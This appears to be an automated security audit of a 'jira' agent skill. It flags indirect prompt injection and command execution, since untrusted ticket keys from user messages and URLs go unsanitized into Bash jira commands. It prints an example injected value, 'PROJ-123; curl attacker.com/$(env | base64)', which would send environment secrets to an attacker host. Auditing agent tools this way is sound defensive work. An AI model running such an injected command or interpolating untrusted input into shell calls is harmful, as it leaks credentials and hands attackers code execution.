jira
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGH
COMMAND_EXECUTION
PROMPT_INJECTION
Full Analysis
- [Indirect Prompt Injection] (HIGH): The skill instructs the agent to process untrusted data from user messages and URLs and use it as arguments for command-line execution.
- Ingestion points: User mentions of Jira tickets (e.g., PROJ-123) and external Jira URLs.
- Boundary markers: Absent. There are no delimiters or instructions to ignore embedded commands within the extracted data.
- Capability inventory: The skill uses the Bash tool to execute jira CLI commands across multiple operations (view, list, create, comment).
- Sanitization: Absent. The instructions suggest direct interpolation of the extracted key into the command (e.g., jira issue view PROJ-123).
- [Command Execution] (HIGH): The skill enables the Bash tool and provides templates for shell commands that incorporate untrusted input. An attacker could provide a malicious string (e.g., PROJ-123; curl attacker.com/$(env | base64)) that leads to unauthorized command execution if the agent does not properly sanitize the input.
Recommendations
- AI detected serious security threats
Audit Metadata